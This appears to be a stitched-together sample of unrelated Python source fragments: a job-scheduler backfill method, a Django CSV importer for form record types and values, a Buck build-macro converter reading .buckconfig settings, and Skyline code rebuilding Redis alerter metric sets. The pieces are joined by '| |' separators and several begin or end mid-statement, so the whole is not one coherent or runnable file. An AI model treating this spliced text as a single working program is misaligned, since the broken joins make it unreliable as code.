vector[i * TASK_FEATURES:(i + 1) * TASK_FEATURES] = self.pairs[i][1:]
return vector
def moveforward_for_resources_backfill(self, task):
assert not self.cluster.can_allocated(task)
earliest_start_time = self.current_timestamp
self.running_tasks.sort(key=lambda running_task: (running_task.scheduled_time + running_task.request_time))
free_processors = self.cluster.free_node * self.cluster.num_procs_per_node
for running_task in self.running_tasks:
free_processors += len(running_task.allocated_machines) * self.cluster.num_procs_per_node
earliest_start_time = (running_task.scheduled_time + running_task.request_time)
if | |
'\\r').replace('\n', '\\n')
csv_json = json.loads(post_data.get('csv_json').encode('utf-8').replace('\t', '\\t').replace('\r', '\\r').replace('\n', '\\n'))
print >> sys.stderr, post_data
#setup Dictionaries for post import self-referential needs
#setup a dict for hierarchy value
hierarchyDict = {}
#setup a recordreferencevalue dictionary for the form type if a particular reference is self-referencing to this same form type
selfReferenceList = []
#Get our current FormType
currentFormType = FormType.objects.all().filter(project=request.user.permissions.project, pk=request.POST['formtype_pk'])[0]
#Each row in the CSV file represents a new 'Form' of the 'currentFormType'
#Let's make a 'row' counter to help with indexing through the CSV file
row_index = 0
#Let's make an incremental counter for record type orders
order_counter = 1;
#I'm also going to make a List() of AttributeTypes/ReferenceTypes. This is done so that
#after 1 iteration of the importer loop, the reference types/ attribute types are already created. We
#don't need to create them for every row--so after the first row, we reference this list for the reference
# and attribute values
typeList = {}
print >> sys.stderr, "Just making sure things are working still....where's the stop point?"
main_ID_Field = ""
keepAliveTimer = time.clock()
#print >>sys.stderr, "Starting row loop: " + str(timerB) + " Time elapsed = " + str(timerB-timerA)
#For each row of the CSV
for row in csv_json:
print >> sys.stderr, "222 Just making sure things are working still....where's the stop point?"
timerBeginRow = time.clock()
#print >>sys.stderr, "Starting a new row: " + str(timerBeginRow)
#If we are past index '0' then let's continue with the rest of the importer
#Let's get the main ID
if row_index == 0:
for key, value in row.iteritems():
if 'record__'+key+'__ismainID' in post_data:
main_ID_Field = key
break
currentForm = Form.objects.all().filter(project=request.user.permissions.project, form_type=currentFormType, form_name=row[main_ID_Field])
if currentForm.exists():
currentForm = currentForm[0]
else:
print >>sys.stderr, "Skipping Form--Could not find form name:" + row[main_ID_Field]
continue
for key, value in row.iteritems():
print >>sys.stderr, key
if key != main_ID_Field:
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ADD A RECORD REFERENCE TYPE @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#------------------------------------------------------------------------------------------------------------------------
#Test if it is a reference type by checking the POST_DATA if 'record__(n)__isreference' exists
#If it is a reference Type:
if 'record__'+str(key)+'__isreference' in post_data:
#We want to make sure we only create the ReferenceType's once--otherwise we populate the database with several
#unecessary copies and relations that muddy everything. So if we're past the first row/iteration of the JSON, the reference types are
#already created and stored in a list to reference after
if row_index < 1:
#create a new FormRecordReferenceType and set "record_type" variable to the header column user-given name value
newFormRecordReferenceType = FormRecordReferenceType()
newFormRecordReferenceType.project = PROJECT
newFormRecordReferenceType.is_public = False
newFormRecordReferenceType.record_type = post_data.get('record__'+str(key)+'__name')
#also set "form_type_parent" to the current formType we are importing
newFormRecordReferenceType.form_type_parent = currentFormType
#now set "form_type_reference" to the selected FormTypeReference value in the current importer Column
#if the value == 'default' then set reference to this same FormType
if post_data.get('record__'+str(key)+'__reftype') == 'default':
newFormRecordReferenceType.form_type_reference = currentFormType
#otherwise set it to the given pk value of a FormType object
else:
newFormRecordReferenceType.form_type_reference = FormType.objects.get(pk=post_data.get('record__'+str(key)+'__reftype'))
#Set an arbitrary initial order for the type
newFormRecordReferenceType.order_number = order_counter
order_counter += 1
#save the Record Reference Type
newFormRecordReferenceType.save()
#add it to the list so that the reference value can reference it
typeList[key] = newFormRecordReferenceType
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ADD A RECORD REFERENCE VALUE @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#-------------------------------------------------------------------------------------------------------------------------
#If this form already has a FRRV for this importer(e.g. we are running multiple rows with the same ID) then just reference
# --that existing FRRV and add the new reference, as well as the ext_key
possibleFRRV = currentForm.ref_to_parent_form.all().filter(record_reference_type=typeList[key])
if possibleFRRV.exists():
newFormRecordReferenceValue = possibleFRRV[0]
newFormRecordReferenceValue.external_key_reference += "," + value
newFormRecordReferenceValue.save()
else:
#Create a new RecordReferenceValue
newFormRecordReferenceValue = FormRecordReferenceValue()
newFormRecordReferenceValue.project = PROJECT
newFormRecordReferenceValue.is_public = False
#set the "external_key_reference" to the column value of the csv row
newFormRecordReferenceValue.external_key_reference = value
#set the "form_parent" to the current row's Form
newFormRecordReferenceValue.form_parent = currentForm
#set the "record_reference_type" to the current RecordReferenceType
logging.info("line626 " + str(typeList[key].form_type_reference) + " :: " + newFormRecordReferenceValue.external_key_reference)
newFormRecordReferenceValue.record_reference_type = typeList[key]
#save the value to give it a pk value
newFormRecordReferenceValue.save()
#logging.info("We are about to check the reference for: " + str(newFormRecordReferenceValue))
#If this reference is self-referencing to the same form formtype we're importing, then similar to the hierchy references,
#--we need to store a list of the reference value objects to load once the entire form type has been imported. We don't need key values because
#--the external key reference is already saved for the lookup on the model.
#--I'm using the objects rather pk values because that will save us time on SQL queries later
if post_data.get('record__'+str(key)+'__reftype') == 'default':
selfReferenceList.append(newFormRecordReferenceValue)
else:
#Now we need to set the value for "record_reference" which will involve a query
#And since the external key could contain multiple values, we need to split them by the comma delimeter
#logging.info(newFormRecordReferenceValue.external_key_reference + " : BEFORE SPLIT")
possibleRefValues = newFormRecordReferenceValue.external_key_reference.split(",")
#logging.info(str(possibleRefValues) + " : SPLIT")
#clear our list of refs everytime to ensure we don't double add--it will use the ext key to find them
# --this isn't the fastest way of doing this, but I need a quick fix for now !!!TODO
newFormRecordReferenceValue.record_reference.clear()
#for all forms in the selected FormType reference
for aForm in newFormRecordReferenceValue.record_reference_type.form_type_reference.form_set.all().prefetch_related():
#if the current external ID value == to the iterated forms "form_num"
#Make sure we convert the INT form-num to a STR first or it will fail the check
for refValue in possibleRefValues:
if refValue == str(aForm.form_number):
#remove this value from future matches to ensure we don't double add it
possibleRefValues.remove(refValue)
#set the current FormRecordReferenceValue.record_reference to the current form in the loop iteration
newFormRecordReferenceValue.record_reference.add(aForm)
#logging.info(newFormRecordReferenceValue.external_key_reference + " : AFTER SPLIT")
#if there are no matches by the last iteration of the loop,
#we can do nothing to leave the record_reference value as "None" (the user can set this later)
#This might happen if the user is importing a new form type that references itself, or references
#another form type that hasn't yet been imported. The external_key_reference's are still saved
#so the user can run another tool to match these keys later once all the Form Types and forms have been
#imported through this tool
#save the RecordReferenceValue
newFormRecordReferenceValue.save()
#timerE = time.clock()
#print >>sys.stderr, "Ending ref lookup: " + str(timerE) + " Time elapsed = " + str(timerE-timerD)
#If it is not a reference type, then we are adding an attribute type instead
else:
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ADD A RECORD ATTRIBUTE TYPE @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#------------------------------------------------------------------------------------------------------------------------
#We want to make sure we only create the AttributeType's once--otherwise we populate the database with several
#unecessary copies and relations that muddy everything. So if we're past the first row, the attribute types are
#already created and stored in a list to reference after
if row_index < 1:
#create a new FormRecordAttributeType and set "record_type" variable to the header column name
newFormRecordAttributeType = FormRecordAttributeType()
newFormRecordAttributeType.record_type = post_data.get('record__'+str(key)+'__name')
newFormRecordAttributeType.project = PROJECT
newFormRecordAttributeType.is_public = False
#also set "form_type" to the current formType we are importing
newFormRecordAttributeType.form_type = currentFormType
#Set an arbitrary initial order for the type
newFormRecordAttributeType.order_number = order_counter
order_counter += 1
#save the RecordAttributeType
newFormRecordAttributeType.save()
#add the attributeType to the typeList so that the attribute value can reference it
typeList[key] = newFormRecordAttributeType
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ADD A RECORD Attribute VALUE @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#-------------------------------------------------------------------------------------------------------------------------
#If this form already has a FRRV for this importer(e.g. we are running multiple rows with the same ID) then just reference
# --that existing FRRV and add the new reference, as well as the ext_key
possibleFRAV = currentForm.formrecordattributevalue_set.all().filter(record_attribute_type=typeList[key])
if possibleFRAV.exists():
newFormRecordAttributeValue = possibleFRAV[0]
newFormRecordAttributeValue.record_value = newFormRecordAttributeValue.record_value + "," + value
newFormRecordAttributeValue.save()
else:
#Create a new RecordAttributeValue
newFormRecordAttributeValue = FormRecordAttributeValue()
newFormRecordAttributeValue.project = PROJECT
newFormRecordAttributeValue.is_public = False
#set the "record_value" to the column value of the csv row
newFormRecordAttributeValue.record_value = value
#set the "form_parent" to the current row's Form
newFormRecordAttributeValue.form_parent = currentForm
#set the "record_attribute_type" to the current RecordAttributeType
newFormRecordAttributeValue.record_attribute_type = typeList[key]
#save the RecordAttributeValue
newFormRecordAttributeValue.save()
row_index | |
<reponame>xw285cornell/buckit
#!/usr/bin/env python2
# Copyright 2016-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
# TODO(T20914511): Until the macro lib has been completely ported to
# `include_defs()`, we need to support being loaded via both `import` and
# `include_defs()`. These ugly preamble is thus here to consistently provide
# `allow_unsafe_import()` regardless of how we're loaded.
import contextlib
try:
allow_unsafe_import
except NameError:
@contextlib.contextmanager
def allow_unsafe_import(*args, **kwargs):
yield
import collections
import copy
import functools
import json
import pipes
import re
with allow_unsafe_import():
from distutils.version import LooseVersion
import os
import platform as platmod
import shlex
import textwrap
# Hack to make include_defs flake8 safe.
_include_defs = include_defs # noqa: F821
# Hack to make include_defs sane and less magical forr flake8
def include_defs(path):
global _include_defs__imported
_include_defs(path, '_include_defs__imported') # noqa: F821
ret = _include_defs__imported
del _include_defs__imported
return ret
# Hack to make internal Buck macros flake8-clean until we switch to buildozer.
def import_macro_lib(path):
return include_defs('{}/{}.py'.format(
read_config('fbcode', 'macro_lib', '//macro_lib'), path # noqa: F821
))
Rule = import_macro_lib('rule').Rule
target = import_macro_lib('target')
build_info = import_macro_lib('build_info')
load("@fbcode_macros//build_defs:allocators.bzl", "allocators")
load("@fbcode_macros//build_defs:build_mode.bzl", _build_mode="build_mode")
load("@fbcode_macros//build_defs:compiler.bzl", "compiler")
load("@fbcode_macros//build_defs:cpp_common.bzl", "cpp_common")
load("@fbcode_macros//build_defs:cpp_flags.bzl", "cpp_flags")
load("@fbcode_macros//build_defs:coverage.bzl", "coverage")
load("@fbcode_macros//build_defs:config.bzl", "config")
load("@fbcode_macros//build_defs:modules.bzl", "modules")
load("@fbcode_macros//build_defs:python_typing.bzl", "gen_typing_config_attrs")
load("@fbcode_macros//build_defs:core_tools.bzl", "core_tools")
load("@fbcode_macros//build_defs:platform_utils.bzl", "platform_utils")
load("@fbcode_macros//build_defs/config:read_configs.bzl", "read_flags")
load("@fbcode_macros//build_defs:sanitizers.bzl", "sanitizers")
load("@fbcode_macros//build_defs:target_utils.bzl", "target_utils")
load("@fbcode_macros//build_defs:third_party.bzl", "third_party")
load("@fbcode_macros//build_defs:src_and_dep_helpers.bzl", "src_and_dep_helpers")
load("@fbcode_macros//build_defs/facebook:python_wheel_overrides.bzl", "python_wheel_overrides")
load("@bazel_skylib//lib:partial.bzl", "partial")
MACRO_PATTERN = (
re.compile('\\$\\((?P<name>[^)\\s]+)(?: (?P<args>[^)]*))?\\)'))
Context = collections.namedtuple(
'Context',
[
'buck_ops',
'build_mode',
'default_compiler',
'global_compiler',
'coverage',
'link_style',
'mode',
'lto_type',
'third_party_config',
'config',
],
)
BuckOperations = collections.namedtuple(
'BuckOperations',
[
'add_build_file_dep',
'glob',
'include_defs',
'read_config',
],
)
Tp2ProjectBuild = collections.namedtuple(
'Tp2ProjectBuild',
[
'project_deps',
'subdir',
'versions',
],
)
CXX_BUILD_INFO_TEMPLATE = """\
#include <stdint.h>
const char* const BuildInfo_kBuildMode = "{build_mode}";
const char* const BuildInfo_kBuildTool = "{build_tool}";
const char* const BuildInfo_kCompiler = "{compiler}";
const char* const BuildInfo_kHost = "{host}";
const char* const BuildInfo_kPackageName = "{package_name}";
const char* const BuildInfo_kPackageVersion = "{package_version}";
const char* const BuildInfo_kPackageRelease = "{package_release}";
const char* const BuildInfo_kPath = "{path}";
const char* const BuildInfo_kPlatform = "{platform}";
const char* const BuildInfo_kRevision = "{revision}";
const char* const BuildInfo_kRule = "{rule}";
const char* const BuildInfo_kRuleType = "{rule_type}";
const char* const BuildInfo_kTime = "{time}";
const char* const BuildInfo_kTimeISO8601 = "{time_iso8601}";
const char* const BuildInfo_kUpstreamRevision = "{upstream_revision}";
const char* const BuildInfo_kUser = "{user}";
const uint64_t BuildInfo_kRevisionCommitTimeUnix = {revision_epochtime};
const uint64_t BuildInfo_kTimeUnix = {epochtime};
const uint64_t BuildInfo_kUpstreamRevisionCommitTimeUnix =
{upstream_revision_epochtime};
"""
GENERATED_LIB_SUFFIX = '__generated-lib__'
def is_collection(obj):
"""
Return whether the object is a array-like collection.
"""
for typ in (list, set, tuple):
if isinstance(obj, typ):
return True
return False
_THIN_LTO_FLAG = ["-flto=thin"]
_LTO_FLAG = ["-flto"]
def _lto_linker_flags_partial(_, compiler):
if compiler != "clang":
return []
if config.get_lto_type() == "thin":
return _THIN_LTO_FLAG
return _LTO_FLAG
class Converter(object):
def __init__(self, context):
self._context = context
self._tp2_build_dat_cache = {}
def get_third_party_root(self, platform):
if self._context.config.get_third_party_use_platform_subdir():
return os.path.join(
self._context.config.get_third_party_buck_directory(),
platform)
else:
return self._context.config.get_third_party_buck_directory()
def get_third_party_build_root(self, platform):
if self._context.config.get_third_party_use_build_subdir():
return os.path.join(self.get_third_party_root(platform), 'build')
else:
return self.get_third_party_root(platform)
def get_third_party_tools_root(self, platform):
return os.path.join(self.get_third_party_root(platform), 'tools')
def get_platform_flags_from_arch_flags(self, arch_flags):
"""
Format a dict of architecture names to flags into a platform flag list
for Buck.
"""
def _get_platform_flags_from_arch_flags_partial(platform_flags, platform, _):
return platform_flags.get(platform)
platform_flags = {}
for arch, flags in sorted(arch_flags.items()):
platforms = platform_utils.get_platforms_for_architecture(arch)
for platform in platform_utils.get_platforms_for_architecture(arch):
platform_flags[platform] = flags
return src_and_dep_helpers.format_platform_param(
partial.make(
_get_platform_flags_from_arch_flags_partial, platform_flags))
def get_tool_version(self, platform, project):
conf = self._context.third_party_config['platforms'][platform]
return LooseVersion(conf['tools']['projects'][project])
def get_tool_target(self, target, platform):
"""
Return the target for the tool described by the given RuleTarget.
"""
return target_utils.to_label(
None,
third_party.get_tool_path(target.base_path, platform),
target.name)
def get_tp2_dep_path(self, project, platform):
"""
Return the path within third-party for the given project. This will be
the directory, not a specific target or binary. Based on configuration,
and the path may be modified to fit fbcode's layout
"""
if self._context.config.get_third_party_use_build_subdir():
return os.path.join(self.get_third_party_root(platform), 'build', project)
else:
return project
def without_platforms(self, formatted): # type: PlatformParam[Any, List[Tuple[str, Any]]] -> Any
"""
Drop platform-specific component of the fiven `PlatformParam`, erroring
out if it contained anything.
"""
param, platform_param = formatted
if platform_param:
raise ValueError(
'unexpected platform sources: {!r}'.format(platform_param))
return param
def merge_platform_deps(self, dst, src):
for platform, deps in src.iteritems():
dst.setdefault(platform, [])
dst[platform].extend(deps)
def is_test(self, buck_rule_type):
return buck_rule_type.endswith('_test')
def read_choice(self, section, field, choices, default=None):
"""
Read a string from `.buckconfig` which can be one of the values given
in `choices`.
"""
val = self._context.buck_ops.read_config(section, field)
if val is not None:
if val in choices:
return val
else:
raise TypeError(
'`{}:{}`: must be one of ({}), but was {!r}'
.format(section, field, ', '.join(choices), val))
elif default is not None:
return default
else:
raise KeyError(
'`{}:{}`: no value set'.format(section, field))
def read_bool(self, section, field, default=None, required=True):
"""
Read a `boolean` from `.buckconfig`.
"""
val = self._context.buck_ops.read_config(section, field)
if val is not None:
if val.lower() == 'true':
return True
elif val.lower() == 'false':
return False
else:
raise TypeError(
'`{}:{}`: cannot coerce {!r} to bool'
.format(section, field, val))
elif default is not None:
return default
elif required:
raise KeyError(
'`{}:{}`: no value set'.format(section, field))
def read_int(self, section, field, default=None):
"""
Read an `int` from `.buckconfig`.
"""
val = self._context.buck_ops.read_config(section, field)
if val is not None:
try:
return int(val)
except ValueError as e:
raise TypeError(
'`{}:{}`: cannot coerce {!r} to int: {}'
.format(section, field, val, e))
elif default is not None:
return default
else:
raise KeyError(
'`{}:{}`: no value set'.format(section, field))
def read_string(self, section, field, default=None):
"""
Read a `string` from `.buckconfig`.
"""
val = self._context.buck_ops.read_config(section, field)
if val is None:
val = default
return val
def read_list(self, section, field, default=None):
"""
Read a `list` from `.buckconfig`.
"""
val = self._context.buck_ops.read_config(section, field)
if val is None:
return default
return val.split()
def get_strip_mode(self, base_path, name):
"""
Return a flag to strip debug symbols from binaries, or `None` if
stripping is not enabled.
"""
# `dev` mode has lightweight binaries, so avoid stripping to keep rule
# keys stable.
if self._context.mode.startswith('dev'):
return 'none'
# If this is a core tool, we never strip to keep stable rule keys.
if core_tools.is_core_tool(base_path, name):
return 'none'
# Otherwise, read the config setting.
return self.read_choice(
'misc',
'strip_binaries',
['none', 'debug-non-line', 'full'],
default='none')
def get_strip_ldflag(self, mode):
"""
Return the linker flag to use for the given strip mode.
"""
if mode == 'full':
return '-Wl,-S'
elif mode == 'debug-non-line':
return '-Wl,--strip-debug-non-line'
elif mode == 'none':
return None
else:
raise Exception('invalid strip mode: ' + mode)
def get_build_info_linker_flags(
self,
base_path,
name,
rule_type,
platform,
compiler):
"""
Get the linker flags to configure how the linker embeds build info.
"""
ldflags = []
mode = build_info.get_build_info_mode(base_path, name)
# Make sure we're not using non-deterministic build info when caching
# is enabled.
if mode == 'full' and self.read_bool('cxx', 'cache_links', True):
raise ValueError(
'cannot use `full` build info when `cxx.cache_links` is set')
# Add in explicit build info args.
if mode != 'none':
# Pass the build info mode to the linker.
ldflags.append('--build-info=' + mode)
explicit = (
build_info.get_explicit_build_info(
base_path,
name,
rule_type,
platform,
compiler))
ldflags.append('--build-info-build-mode=' + explicit.build_mode)
if explicit.package_name:
ldflags.append(
'--build-info-package-name=' + explicit.package_name)
if explicit.package_release:
ldflags.append(
'--build-info-package-release=' + explicit.package_release)
if explicit.package_version:
ldflags.append(
'--build-info-package-version=' + explicit.package_version)
ldflags.append('--build-info-compiler=' + explicit.compiler)
ldflags.append('--build-info-platform=' + explicit.platform)
ldflags.append('--build-info-rule=' + explicit.rule)
ldflags.append('--build-info-rule-type=' + explicit.rule_type)
return ldflags
def read_shlib_interfaces(self, buck_platform):
return self.read_choice(
'cxx#' + buck_platform,
'shlib_interfaces',
['disabled', 'enabled', 'defined_only'])
def get_binary_ldflags(self, base_path, name, rule_type, platform):
"""
Return ldflags set via various `.buckconfig` settings.
"""
ldflags = []
# If we're using TSAN, we need to build PIEs.
if sanitizers.get_sanitizer() == 'thread':
ldflags.append('-pie')
# Remove unused section to reduce the code bloat in sanitizer modes
if sanitizers.get_sanitizer() is not None:
ldflags.append('-Wl,--gc-sections')
# It's rare, but some libraries use variables defined in object files
# in the top-level binary. This works as, when linking the binary, the
# linker sees this undefined reference in the dependent shared library
# and so makes sure to export this symbol definition to the binary's
# dynamic symbol table. However, when using shared library interfaces
# in `defined_only` mode, undefined references are stripped from shared
# libraries, so the linker never knows to export these symbols to the
# binary's dynamic symbol table, and the binary fails to load at
# runtime, as the dynamic loader can't resolve that symbol.
#
# So, when linking a binary when using shared library interfaces in
# `defined_only` mode, pass `--export-dynamic` to the | |
%s items' % str(len(last_all_alerts_set)))
except:
logger.error(traceback.format_exc())
logger.error('error :: metrics_manager :: failed to generate a list from the analyzer.last_all_alerts Redis key')
last_all_alerts_set = None
all_alerts_set = None
if all_alerts:
try:
all_alerts_list = [list(row) for row in all_alerts]
# A normal sorted nor set can be used as the list has dicts in it
all_alerts_set = sorted(all_alerts_list, key=lambda item: item[0])
logger.info('metrics_manager :: all_alerts_set from all_alerts has %s items' % str(len(all_alerts_set)))
except:
logger.error(traceback.format_exc())
logger.error('error :: metrics_manager :: failed to create a sorted list from all_alerts object of type %s' % str(type(all_alerts_list)))
# Set the last known alert configuration to the current configuration
try:
self.redis_conn.set('analyzer.last_all_alerts', str(all_alerts_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: metrics_manager :: failed to set analyzer.last_all_alerts Redis key')
# Compare the last known with the current, if there was a last known
# configuration, if different do a full refresh
if last_all_alerts_set:
if str(all_alerts_set) != str(last_all_alerts_set):
logger.info('metrics_manager :: alert settings have changed, sets will be refreshed')
refresh_redis_alert_sets = True
# Compare the current unique_metrics to the last smtp_alerter_metrics +
# non_smtp_alerter_metrics, if they have changed do a full refresh
if not refresh_redis_alert_sets:
smtp_alerter_metrics = []
non_smtp_alerter_metrics = []
try:
smtp_alerter_metrics = list(self.redis_conn_decoded.smembers('analyzer.smtp_alerter_metrics'))
except:
logger.error(traceback.format_exc())
logger.error('error :: metrics_manager :: failed to get list from analyzer.smtp_alerter_metrics Redis key')
refresh_redis_alert_sets = True
smtp_alerter_metrics = None
try:
non_smtp_alerter_metrics = list(self.redis_conn_decoded.smembers('analyzer.non_smtp_alerter_metrics'))
except:
logger.error(traceback.format_exc())
logger.error('error :: metrics_manager :: failed to get list from analyzer.non_smtp_alerter_metrics Redis key')
non_smtp_alerter_metrics = None
known_alerter_metrics_set = None
if smtp_alerter_metrics or non_smtp_alerter_metrics:
try:
known_alerter_metrics = smtp_alerter_metrics + non_smtp_alerter_metrics
known_alerter_metrics_set = set(known_alerter_metrics)
except:
logger.error(traceback.format_exc())
logger.error('error :: metrics_manager :: failed to get list from analyzer.non_smtp_alerter_metrics Redis key')
# Compare known metrics to current unique_base_names if they are
# different do a full refresh
if known_alerter_metrics_set:
changed_metrics = []
try:
unique_base_names_set = set(list(unique_base_names))
if unique_base_names_set == known_alerter_metrics_set:
logger.info('metrics_manager :: unique_base_names_set and known_alerter_metrics_set are the same')
else:
set_difference = unique_base_names_set.difference(known_alerter_metrics_set)
for metric in set_difference:
changed_metrics.append(metric)
logger.info('metrics_manager :: there are %s metrics that have changed, sets will be refreshed' % str(len(changed_metrics)))
refresh_redis_alert_sets = True
del set_difference
except:
logger.error(traceback.format_exc())
logger.error('error :: metrics_manager :: failed to determine hether the unique_base_names_set and known_alerter_metrics_set are different')
smtp_alerter_metrics = []
non_smtp_alerter_metrics = []
mirage_metrics = []
refresh_redis_alert_sets = True
# @added 20201104 - Feature #3788: snab_flux_load_test
# Feature #3560: External alert config
if refresh_redis_alert_sets:
logger.info('metrics_manager :: sets being refreshed, determining smtp_alerter_metrics')
all_smtp_alerter_metrics = []
all_mirage_metrics = []
mirage_metrics_expiration_times = []
mirage_metrics_keys = []
start_refresh = timer()
for base_name in unique_base_names:
if base_name not in all_smtp_alerter_metrics:
# Use the all_alerts list which includes external alert configs
# for alert in settings.ALERTS:
for alert in all_alerts:
pattern_match = False
if str(alert[1]) == 'smtp':
try:
pattern_match, metric_matched_by = matched_or_regexed_in_list(skyline_app, base_name, [alert[0]])
if LOCAL_DEBUG and pattern_match:
logger.debug('debug :: metrics_manager :: %s matched alert - %s' % (base_name, alert[0]))
try:
del metric_matched_by
except:
pass
if pattern_match:
all_smtp_alerter_metrics.append(base_name)
# @added 20160922 - Branch #922: Ionosphere
# Add a Redis set of mirage.unique_metrics
if settings.ENABLE_MIRAGE:
mirage_metric = False
try:
SECOND_ORDER_RESOLUTION_FULL_DURATION = int(alert[3])
if SECOND_ORDER_RESOLUTION_FULL_DURATION > 24:
mirage_metric = True
except:
mirage_metric = False
if mirage_metric:
metric_name = '%s%s' % (settings.FULL_NAMESPACE, base_name)
all_mirage_metrics.append(metric_name)
# @added 20200805 - Task #3662: Change mirage.last_check keys to timestamp value
# Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Add the mirage metric and its EXPIRATION_TIME to
# the mirage.metrics_expiration_times so that Mirage
# can determine the metric EXPIRATION_TIME without
# having to create and iterate the all_alerts
# object in the Mirage analysis phase so that the
# reported anomaly timestamp can be used to determine
# whether the EXPIRATION_TIME should be applied to a
# batch metric in the alerting and Ionosphere contexts
# mirage_alert_expiration_data = [base_name, int(alert[2])]
mirage_alert_expiration_data = [base_name, int(alert[2])]
mirage_metrics_expiration_times.append(mirage_alert_expiration_data)
# @added 20200904 - Task #3730: Validate Mirage running multiple processes
# Also always add the mirage.metrics Redis key for the
# metric which contains its hours_to_resolve so
# that the spin_process can add the mirage check
# files immediately, rather than waiting to add
# the mirage checks all in the alerting phase.
# This is done to reduce the time it takes to
# get through the analysis pipeline.
mirage_metrics_keys.append([base_name, int(alert[2]), SECOND_ORDER_RESOLUTION_FULL_DURATION])
break
except:
pattern_match = False
end_classify = timer()
logger.info('metrics_manager :: classifying metrics took %.6f seconds' % (end_classify - start_refresh))
logger.info('metrics_manager :: %s all_smtp_alerter_metrics were determined' % str(len(all_smtp_alerter_metrics)))
if all_smtp_alerter_metrics:
smtp_alerter_metrics = list(set(list(all_smtp_alerter_metrics)))
logger.info('metrics_manager :: %s unique smtp_alerter_metrics determined' % str(len(smtp_alerter_metrics)))
# Recreate the Redis set the analyzer.smtp_alerter_metrics
if smtp_alerter_metrics:
logger.info('metrics_manager :: recreating the analyzer.smtp_alerter_metrics Redis set')
try:
self.redis_conn.sadd('new_analyzer.smtp_alerter_metrics', *set(smtp_alerter_metrics))
except:
logger.error(traceback.format_exc())
logger.error('error :: metrics_manager :: failed to add multiple members to the new_analyzer.smtp_alerter_metrics Redis set')
try:
self.redis_conn.delete('analyzer.smtp_alerter_metrics.old')
except:
pass
try:
self.redis_conn.rename('analyzer.smtp_alerter_metrics', 'analyzer.smtp_alerter_metrics.old')
except:
pass
try:
# @added 20180423 - Feature #2360: CORRELATE_ALERTS_ONLY
# Branch #2270: luminosity
# Add a Redis set of smtp_alerter_metrics for Luminosity to only
# cross correlate on metrics with an alert setting
self.redis_conn.rename('new_analyzer.smtp_alerter_metrics', 'analyzer.smtp_alerter_metrics')
except:
pass
try:
self.redis_conn.delete('analyzer.smtp_alerter_metrics.old')
except:
pass
logger.info('metrics_manager :: recreated the analyzer.smtp_alerter_metrics Redis set')
logger.info('metrics_manager :: determing non_smtp_alerter_metrics')
try:
unique_base_names_set = set(list(unique_base_names))
smtp_alerter_metrics_set = set(list(smtp_alerter_metrics))
if unique_base_names_set == smtp_alerter_metrics_set:
logger.info('metrics_manager :: unique_base_names_set and smtp_alerter_metrics_set are the same, no non_smtp_alerter_metrics')
else:
set_difference = unique_base_names_set.difference(smtp_alerter_metrics_set)
for metric in set_difference:
non_smtp_alerter_metrics.append(metric)
logger.info('metrics_manager :: there are %s non_alerter_metrics' % str(len(non_smtp_alerter_metrics)))
del set_difference
except:
logger.error(traceback.format_exc())
logger.error('error :: metrics_manager :: failed to determine non_smtp_alerter_metrics from sets')
# Recreate the Redis set the analyzer.non_smtp_alerter_metrics
if non_smtp_alerter_metrics:
logger.info('metrics_manager :: recreating the analyzer.non_smtp_alerter_metrics Redis set')
try:
self.redis_conn.sadd('new_analyzer.non_smtp_alerter_metrics', *set(non_smtp_alerter_metrics))
except:
logger.error(traceback.format_exc())
logger.error('error :: metrics_manager :: failed to add multiple members to the new_analyzer.non_smtp_alerter_metrics Redis set')
try:
self.redis_conn.delete('analyzer.non_smtp_alerter_metrics.old')
except:
pass
try:
self.redis_conn.rename('analyzer.non_smtp_alerter_metrics', 'analyzer.non_smtp_alerter_metrics.old')
except:
pass
try:
self.redis_conn.rename('new_analyzer.non_smtp_alerter_metrics', 'analyzer.non_smtp_alerter_metrics')
except:
pass
try:
self.redis_conn.delete('analyzer.non_smtp_alerter_metrics.old')
except:
pass
logger.info('metrics_manager :: recreated the analyzer.non_smtp_alerter_metrics Redis set')
try:
self.redis_conn.sunionstore('aet.analyzer.smtp_alerter_metrics', 'analyzer.smtp_alerter_metrics')
logger.info('metrics_manager :: copied Redis set analyzer.smtp_alerter_metrics to aet.analyzer.smtp_alerter_metrics via sunion')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to copy Redis set analyzer.smtp_alerter_metrics to aet.analyzer.smtp_alerter_metrics via sunion')
try:
self.redis_conn.sunionstore('aet.analyzer.non_smtp_alerter_metrics', 'analyzer.non_smtp_alerter_metrics')
logger.info('metrics_manager :: copied Redis set analyzer.non_smtp_alerter_metrics to aet.analyzer.non_smtp_alerter_metrics via sunion')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to copy Redis set analyzer.non_smtp_alerter_metrics to aet.analyzer.non_smtp_alerter_metrics via sunion')
logger.info('metrics_manager :: %s mirage metrics determined' % str(len(all_mirage_metrics)))
if all_mirage_metrics:
mirage_metrics = list(set(list(all_mirage_metrics)))
logger.info('metrics_manager :: %s unique mirage_metrics determined' % str(len(mirage_metrics)))
# Recreate the Redis set the mirage.unique_metrics
if mirage_metrics:
logger.info('metrics_manager :: recreating the mirage.unique_metrics Redis set')
try:
self.redis_conn.sadd('new_mirage.unique_metrics', *set(mirage_metrics))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add multiple members to the new_mirage.unique_metrics Redis set')
try:
self.redis_conn.delete('mirage.unique_metrics.old')
except:
pass
try:
self.redis_conn.rename('mirage.unique_metrics', 'mirage.unique_metrics.old')
except:
logger.error(traceback.format_exc())
